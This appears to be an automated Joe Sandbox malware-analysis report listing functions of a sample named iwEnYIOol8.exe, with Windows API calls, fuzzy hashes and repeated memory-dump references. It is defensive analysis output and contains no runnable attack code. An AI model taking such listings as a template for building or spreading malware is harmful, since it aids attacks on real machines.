Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Function 004056AF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004056BF

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F01
EnableWindow.USER32(00000000,00000000), ref: 00401F0C

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
Instruction ID: 5ff066b55785a601c9e0ac29068a23864f952070569c454aea33db173c3c2586
Opcode Fuzzy Hash: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
Instruction Fuzzy Hash: 29E09A369082048FE705EBA4AE494AEB3B4EB80325B200A7FE001F11C0CBB84C00966C

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, mil.ia",?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?, mil.ia",?), ref: 00405B70

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Function 00401578 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0040158C
ShowWindow.USER32(?), ref: 004015A1

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
Instruction ID: ac0fea7dd280022ba88880c6e2ee8458450bfb5d79ff8b32edbe1086f76aca9f
Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
Instruction Fuzzy Hash: 02E04F32B10114ABCB15DFA8FED08ADB3B6EB48320310143FD102B3690C775AD449B18

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\iwEnYIOol8.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764

Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D

Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

